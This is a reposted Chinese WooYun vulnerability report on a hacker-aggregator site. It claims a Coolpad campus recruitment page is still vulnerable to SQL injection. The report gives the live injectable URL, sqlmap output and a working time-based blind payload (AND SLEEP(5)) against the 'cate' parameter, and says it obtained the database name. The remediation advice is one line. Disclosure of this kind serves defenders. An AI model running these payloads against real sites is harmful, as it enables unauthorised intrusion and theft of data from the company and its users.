记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

酷派某站存在SQL盲注漏洞可获取数据库信息

2015-09-07 04:15

WooYun: 酷派某站一处SQL注入

看到这个漏洞,我就去找了一下,发现还是存在注入,我在想,到底有没有整改就公开了。

注入url

http://campus.coolpad.com/index.php?c=schoolRecruitment&cate=1%0a&f=jobPosition&id=dKSg



code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: cate

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: c=schoolRecruitment&cate=1

' AND SLEEP(5) AND 'dqRt'='dqRt&f=jobPosition&id=dKSg

---

[16:52:56] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.5.10

back-end DBMS: MySQL 5.0.11



123.jpg





漏洞证明:

123.jpg



可以得到库名

cool.png



就不继续下去了。

修复方案:

cate 参数依然没有过滤好

知识来源: www.wooyun.org/bugs/wooyun-2015-0138407

阅读:77273 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“酷派某站存在SQL盲注漏洞可获取数据库信息”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词